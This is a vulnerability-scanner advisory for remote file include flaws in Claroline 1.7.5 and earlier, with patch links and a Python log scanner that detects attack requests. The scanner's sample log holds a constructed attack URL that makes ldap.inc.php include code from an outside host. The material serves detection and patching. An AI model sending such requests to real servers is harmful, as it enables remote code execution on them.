VID | 21894
Severity | 40
Port | 80, ...
Protocol | TCP
Class | CGI
Detailed Description |
Claroline is an Open Source collaborative learning environment based on PHP/MySQL that lets teachers and educational institutions create and administer courses through the Web. Claroline version 1.7.5 and earlier is vulnerable to multiple remote file include vulnerabilities caused by improper validation of user-supplied input passed to the 'clarolineRepositorySys' parameter of the 'claroline/auth/extauth/drivers/ldap.inc.php' script and to the 'claro_CasLibPath' parameter of the 'claroline/auth/extauth/casProcess.inc.php' script. If register_globals is enabled, a remote attacker could send a specially-crafted URL request to execute arbitrary PHP code and operating system commands on the affected host.
* References:
  http://www.claroline.net/forum/viewtopic.php?t=5578
  http://www.securityfocus.com/archive/1/433249/30/0/threaded
  http://lists.grok.org.uk/pipermail/full-disclosure/2006-May/045895.html
  http://milw0rm.com/exploits/1766
  http://secunia.com/advisories/20003/
* Platforms Affected: Claroline GPL Open Source Project, Claroline version 1.7.5 and earlier; any operating system, any version
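As an added detection example (not part of this advisory or of the Claroline project), the following Python scans web-server access-log lines for requests to the two scripts named above in which the affected parameter carries a URL instead of a local path, which is the signature of a remote file include attempt. The log lines and IP addresses are constructed for the example.

```python
import re
from urllib.parse import urlparse, parse_qs

# Scripts and parameters named in the advisory (CVE-2006-2284).
VULN_PARAMS = {
    "claroline/auth/extauth/drivers/ldap.inc.php": "clarolineRepositorySys",
    "claroline/auth/extauth/casProcess.inc.php": "claro_CasLibPath",
}

# Pulls the request line out of a Common Log Format entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# A remote include supplies a URL scheme where a filesystem path is expected.
REMOTE_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


def scan_line(line: str):
    """Return a finding dict if the line is an RFI attempt against a listed script, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parsed = urlparse(m.group("target"))
    path = parsed.path.lstrip("/")
    # parse_qs decodes percent-encoding, so %3A%2F%2F is seen as :// as well.
    query = parse_qs(parsed.query, keep_blank_values=True)
    for script, param in VULN_PARAMS.items():
        if not path.endswith(script):
            continue
        for value in query.get(param, []):
            if REMOTE_RE.match(value):
                return {"script": script, "param": param, "value": value}
    return None


def scan_log(lines):
    """Run scan_line over every entry and collect the findings."""
    return [f for f in (scan_line(l) for l in lines) if f]


# Constructed sample log: one RFI attempt, one benign local path, one unrelated request.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/May/2006:12:00:01 +0000] "GET /claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://198.51.100.7/x.txt HTTP/1.0" 200 512',
    '203.0.113.9 - - [10/May/2006:12:00:02 +0000] "GET /claroline/auth/extauth/casProcess.inc.php?claro_CasLibPath=/var/www/claroline/cas HTTP/1.0" 200 300',
    '198.51.100.2 - - [10/May/2006:12:00:03 +0000] "GET /claroline/index.php?cid=TEST HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"RFI attempt: {finding['script']} {finding['param']}={finding['value']}")
```

The check is a log-side indicator only; the actual fix is the vendor upgrade or patch in the Recommendation below, and disabling register_globals removes the precondition the advisory names.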
Recommendation |
Upgrade to the latest version of Claroline (1.7.6 or later), available from the Claroline Download Web site at http://www.claroline.net/download.htm
-- OR --
Apply the patch appropriate for the installed version of Claroline, available from the following web sites:
  Claroline 1.7.5: http://www.claroline.net/dlarea/claroline.patch17501.zip
  Claroline 1.6.4: http://www.claroline.net/dlarea/claroline.patch16401.zip
Related URL | CVE-2006-2284 (CVE)
Related URL | 17873 (SecurityFocus)
Related URL | 26280 (ISS)